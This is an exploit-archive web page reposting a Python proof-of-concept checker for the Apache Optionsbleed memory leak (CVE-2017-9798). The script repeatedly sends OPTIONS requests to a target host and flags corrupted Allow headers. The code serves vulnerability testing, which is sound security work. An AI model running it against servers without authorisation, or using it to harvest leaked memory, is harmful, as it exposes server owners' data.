首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Apache - HTTP OPTIONS Memory Leak
来源:vfocus.net 作者:Bock 发布时间:2017-09-19  
#!/usr/bin/env python3 # Optionsbleed proof of concept test # by Hanno Böck import argparse import urllib3 import re def test_bleed(url, args): r = pool.request('OPTIONS', url) try: allow = str(r.headers["Allow"]) except KeyError: return False if allow in dup: return dup.append(allow) if allow == "": print("[empty] %s" % (url)) elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *(, *[a-zA-Z]+(-[a-zA-Z]+)? *)*$", allow): z = [x.strip() for x in allow.split(',')] if len(z) > len(set(z)): print("[duplicates] %s: %s" % (url, repr(allow))) elif args.all: print("[ok] %s: %s" % (url, repr(allow))) elif re.match("^[a-zA-Z]+(-[a-zA-Z]+)? *( +[a-zA-Z]+(-[a-zA-Z]+)? *)+$", allow): print("[spaces] %s: %s" % (url, repr(allow))) else: print("[bleed] %s: %s" % (url, repr(allow))) return True parser = argparse.ArgumentParser( description='Check for the Optionsbleed vulnerability (CVE-2017-9798).', epilog="Tests server for Optionsbleed bug and other bugs in the allow header.\n\n" "Autmatically checks http://, https://, http://www. and https://www. -\n" "except if you pass -u/--url (which means by default we check 40 times.)\n\n" "Explanation of results:\n" "[bleed] corrupted header found, vulnerable\n" "[empty] empty allow header, does not make sense\n" "[spaces] space-separated method list (should be comma-separated)\n" "[duplicates] duplicates in list (may be apache bug 61207)\n" "[ok] normal list found (only shown with -a/--all)\n", formatter_class=argparse.RawTextHelpFormatter) parser.add_argument('hosttocheck', action='store', help='The hostname you want to test against') parser.add_argument('-n', nargs=1, type=int, default=[10], help='number of tests (default 10)') parser.add_argument("-a", "--all", action="store_true", help="show headers from hosts without problems") parser.add_argument("-u", "--url", action='store_true', help="pass URL instead of hostname") args = parser.parse_args() howoften = int(args.n[0]) dup = [] # Note: This disables warnings about the lack of certificate verification. # Usually this is a bad idea, but for this tool we want to find vulnerabilities # even if they are shipped with invalid certificates. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) pool = urllib3.PoolManager(10, cert_reqs='CERT_NONE') if args.url: test_bleed(args.hosttocheck, args) else: for prefix in ['http://', 'http://www.', 'https://', 'https://www.']: for i in range(howoften): try: if test_bleed(prefix+args.hosttocheck, args) is False: break except Exception as e: pass
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·HPE < 7.2 - Java Deserializati
·Microsoft Windows Kernel - 'wi
·Microsoft Windows Kernel - 'wi
·Microsoft Windows Kernel - 'wi
·Microsoft Windows Kernel - 'wi
·Microsoft Windows Kernel - 'nt
·Microsoft Windows Kernel - 'wi
·Microsoft Windows Kernel - 'wi
·DigiAffiliate 1.4 - Cross-Site
·Digileave 1.2 - Cross-Site Req
·Digirez 3.4 - Cross-Site Reque
·Netdecision 5.8.2 - Local Priv
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved